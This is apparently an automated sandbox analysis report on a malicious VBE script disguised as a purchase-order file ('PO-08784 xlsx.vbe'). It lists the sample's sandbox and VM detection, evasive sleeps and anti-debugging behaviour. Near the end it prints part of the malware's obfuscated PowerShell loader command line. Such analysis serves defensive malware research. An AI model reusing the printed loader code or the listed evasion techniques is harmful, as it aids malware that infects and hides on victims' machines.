Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEG
Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152 Thread sleep count: 639 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152 Thread sleep time: -319500s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9096 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 639 Jump to behavior
Contains functionality to detect virtual machines (SLDT)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9C0006 sldt word ptr [eax] 17_2_1F9C0006
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: wscript.exe, 00000000.00000003.761029190.0000016BB47B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 00000011.00000002.5818301150.00000000014E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PO-08784 xlsx.vbe Binary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeG
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000011.00000002.5826675755.0000000001544000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20456418 LdrInitializeThunk, 17_2_20456418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch 